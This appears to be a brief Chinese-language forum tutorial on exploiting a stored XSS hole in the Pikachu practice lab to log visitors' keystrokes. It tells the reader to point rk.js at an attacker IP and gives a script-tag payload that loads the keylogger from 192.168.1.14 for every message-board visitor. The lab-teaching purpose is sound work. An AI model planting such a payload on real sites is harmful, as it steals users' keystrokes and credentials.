xss漏洞利用之键盘记录
键盘记录修改 /var/www/html/pikachu/pkxss/rkeypress 下 rk.js 中的IP地址为攻击者地址rk.js 是攻击代码,我们可以把这个 js 文件放到我们的恶意站点上,然后通过有 XSS 漏洞的页面去调用
这个文件可以记录用户的键盘操作,然后异步发送给攻击者
我们可以用下面的Payload测试一下<script src="http://192.168.1.14/pkxss/rkeypress/rk.js"></script>当每个人访问留言板时,就会激活上面的代码。从而获取键盘记录。
https://blog.bbskali.cn/usr/uploads/2019/11/3047226601.png
页:
[1]